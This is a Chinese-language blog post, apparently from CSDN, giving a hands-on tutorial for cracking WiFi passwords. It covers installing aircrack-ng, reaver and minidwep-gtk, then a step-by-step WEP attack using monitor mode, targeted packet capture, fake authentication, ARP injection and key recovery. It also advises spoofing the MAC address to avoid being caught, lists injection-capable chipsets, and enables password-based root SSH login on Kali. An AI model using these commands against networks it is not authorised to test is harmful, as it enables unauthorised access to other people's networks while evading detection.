使用minidwep-gtk

【1】wifi破解
【2】ubuntu14.0.4安装步骤
【3】Ubuntu下Aircrack-ng工具包的使用
【4】常用芯片类型
【5】kali2019安装


【1】wifi破解
1.wep加密:此类加密比较老旧,现在的无线路由器已经很少使用此类加密方式,破解只需要大量的数据包即可。
2.WPA / WPA2 PSK加密:这类加密是很安全的,破解的方式是抓握手包然后跑字典。
3.一部分路由器为了方便用户,设置了QSS快速连接功能(或者叫WPS功能)。破解方式是抓握手包跑字典和跑PIN码2种。

【2】ubuntu14.0.4安装步骤
原文连接

  • 安装依赖
    sudo apt-get install build-essential libssl-dev iw libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev libssl0.9.8 libnl libnl-dev
  • 安装aircrack-ng-1.1
tar xvf aircrack-ng-1.1.tar.gz -C ./
cd aircrack-ng-1.1
#修改common.mak 这个文件,找到:
	CFLAGS          ?= -g -W -Wall -Werror -O3
修改为:
	CFLAGS          ?= -g -W -Wall -O3

#开始安装:
    	sudo make
    	sudo make install

#错误解决(Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).)
sudo airodump-ng-oui-update

#ubuntu 中 aircrack-ng 使用教程
1、启动无线网卡的监控模式,在终端中输入:
	sudo airmon-ng start wlan0 	#wlan0是无线网卡的端口,可用命令 ifconfig 查看
2、查看无线AP在终端中输入:
	sudo airodump-ng mon0	#mon0 是启动监控模式后无线网的端口(虚拟网卡),查看有哪些采用wep加密的AP在线,然后按 ctrl+c 中止,不要关闭终端。
3、抓包,打开另一个终端,输入:
	airodump-ng -c 7 -w wep --bssid CC:08:FB:8C:1E:67 mon0	#-c 后面跟着的6是要破解的AP工作频道,–bissid后面跟着欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名
4、与AP建立虚拟连接,再打开一个新终端,输入:
	sudo aireplay-ng -1 0 -a AP’s MAC -h My MAC mon0	#-h后面跟着的My MAC是自己的无线网卡的MAC地址,即ifconfig命令下wlan0对应的mac地址
5、进行注入,成功建立虚拟连接后输入:
	sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0	#现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)
6、解密,收集有15000个以上的DATA之后,另开一个终端,切换到aircrack-ng-1.1目录,执行以下命令
	sudo aircrack-ng wep*.cap	#进行解密,如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的
7、收工,破解出密码后在终端中输入 
	sudo airmon-ng stop mon0 	#关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。
8、如果要卸载ubuntu 上的aircrack-ng,可切换到aircrack-ng-1.1 目录,执行
	sudo make uninstall
  • 安装reaver-1.4
cd reaver-1.4
cd src
./configure
sudo make 
sudo make install
  • 安装minidwep-gtk-40420-ubuntu-64bit
    sudo dpkg -i minidwep-gtk-40420-ubuntu-64bit.deb
    #运行软件
    sudo minidwep-gtk

  • 常见错误

1.avahi-daemon进程导致网卡监控模式无法打开
#Avahi 是 zeroconf 协议的实现。它可以在没有 DNS 服务的局域网里发现基于 zeroconf 协议的设备和服务。它跟 mDNS 一样。除非你有兼容的设备或使用 zeroconf 协议的服务,否则应该关闭它。
/etc/init.d/avahi-daemon stop or service avahi-daemon  stop


【3】Ubuntu下Aircrack-ng工具包的使用
原文链接

安装:$sudo apt-get install aircrack-ng
Aircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个:
airmon-ng处理网卡工作模式
airodump-ng抓包
aircrack-ng破解
aireplay-ng发包,干扰
1)airmon-ng,启动无线网卡进入Monitor模式,
	useage:airmon-ng<start|stop|check><interface>[channel]
		<start|stop|check>:启动,停止,检测
		<interface>:指定无线网卡
		[channel]:监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了
2)airodump-ng,抓包工具,详细用法如下:
	usage:airodump-ng<options><interface>[,<interface>,...]
		Options:
			–ivs:仅将抓取信息保存为.ivs
			–write<prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分
			–beacons:保存所有的beacons,默认情况况下是丢弃那些无用的数据包的
		Filteroptions:
			–encrypt<suite>:使用密码序列过滤AP
			–netmask<netmask>:使用掩码过滤AP
			-bssid<bssid>:使用bssid过滤AP
			-a:过滤无关的客户端
			–help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

3)aireplay-ng,搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉)
	usage:aireplay-ng<options><replayinterface>
		Filteroptions:
			-bbssid:AP的MAC
			-ddmac:目标的MAC
			-ssmac:来源的MAC
			-mlen:最小包长度
			-nlen:最大包长度
			-D:禁用AP发现功能
		Replayoptions:
			-xnbpps:每秒包数量
			-pfctrl:框架设定(hex)
			-abssid:设置AP的mac
			-cdmac:设置目标的MAC
			-hsmac:设置来源的mac
			-gvalue:改变环缓存大小(默认8)
		Fakeauthattackoptions:
			-eessid:设置目标AP的SSID
			-onpckts:每秒爆破的包数量(0自动,默认1)
			-qsec:存活时间秒
			-yprga:共享可信的key流
			–help:显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.
4)aircrack-ng,破解KEY,漫长的过程.漫不漫长取决于两个方面:一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.
	usage:aircrack-ng[options]<.cap/.ivsfile(s)>
		Commonoptions:
			-a<amode>:暴破(1/WEP,2/WPA-PSK)
			-e<essid>:选择essid为目标
			-b<bssid>:选择ap的mac为目标,就是破解识别的关键字
			-q:使用安静模式,无数出模式
			-C<macs>:将所有的AP合并为一个虚拟的
			–help:显示这个帮助
#就WEP破解说明,步骤:
1.修改无线网卡状态:先down掉
2.伪造无线网卡的MAC地址:安全起见,减少被抓到的可能
3.修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4.修改无线网卡状态:up
5.查看网络状态,记录下AP的MAC和本机的MAC,确定攻击目标
6.监听抓包:生成.cap或.ivs
7.干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8.破解.cap或.ivs,获得WEP密码,完成破解

【4】常用芯片类型
用于抓取无线数据包稳定和兼容比较好的三款芯片:
1.RT3070(L)/RT5572:即插即用支持混杂模式、注入模式、AP模式。
2.RT8187(L):即插即用支持混杂模式、注入模式、AP模式。
3.AR9271:即插即用支持混杂模式、注入模式、AP模式。
对于Linux(像Ubuntu、Kali、Debian、Centos等等),这三款芯片即插即用,无需再手动安装驱动。

  • 以下是一些可以在kali上正常工作的芯片组:
    Atheros AR9271
    Ralink RT3070
    Ralink RT3572
    Realtek 8187L (Wireless G adapters)
    Realtek RTL8812AU (2017年新增)
    Ralink RT5370N

  • CDLINUX支持的芯片
    雷凌Ralink 3070芯片
    瑞昱Realtek 8187L芯片

【5】kali2019安装
Kali下载地址
安装教程

#Kali Linux 镜像 各个版本之间的区别
按处理器架构来划分的话,有 64 bit、32 bit、armhf、armel等版本。加light的是轻量版。
e17、Mate、LXDE等是不同的桌面环境。
Kali Linux 2016.2 支持GNOME、KDE、Mate、LXDE和Enlightenment等桌面环境。
#kali2019.2 安装要求,vmware15
  • 配置静态IP
  • 开启ssh
#修改sshd_config文件
	vim /etc/ssh/sshd_config
	将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes
	将PermitRootLogin without-password修改为PermitRootLogin yes
#重启ssh
	service ssh restart
#开机启动
	update-rc.d ssh enable  //系统自动启动SSH服务
	update-rc.d ssh disabled // 关闭系统自动启动SSH服务
  • ll命令不能使用
#修改.bashrc文件
	vim ~/.bashrc
	alias ll='ls -l'  #添加别名
source ~/.bashrc
  • 安装rtl8812au驱动
#配置apt源
	vim /etc/apt/sources.list
		deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
		deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
	apt-get update
apt install realtek-rtl88xxau-dkms 
#设置usb3.0并重启
  • 安装minidwep-gtk-40420-ubuntu-64bit
    sudo dpkg -i minidwep-gtk-40420-ubuntu-64bit.deb
    #运行软件
    reboot
    sudo minidwep-gtk
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:上身试试 返回首页
实付 9.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值